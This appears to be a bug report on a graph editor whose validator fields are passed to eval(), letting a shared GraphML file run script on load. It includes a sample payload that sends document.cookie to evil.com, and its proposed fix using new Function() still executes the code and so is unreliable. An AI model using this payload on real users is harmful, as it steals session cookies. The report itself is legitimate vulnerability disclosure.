eval() on validator strings = free XSS via shared graphs #307
Description
setEdgeNodeValidator in 3-component.js just straight up eval()s whatever string is in the node/edge validator fields. Those strings come from the Settings modal (user-typed JS) and they're also baked into saved GraphML files.
So if someone shares a graph with a validator like }); fetch('https://evil.com?c='+document.cookie); ((x=>{... congrats, you just got owned by opening a file
The eslint-disable comments on those lines tell me someone knew this was bad and shipped it anyway\
this.nodeValidator = eval(nodeValidator);
this.edgeValidator = eval(edgeValidator);
Repro: Settings - paste }); alert(1); ((x=>{ into validator - save - reload. Runs on load
Fix can be.. use new Function() or sandbox it. eval on untrusted input is a problem.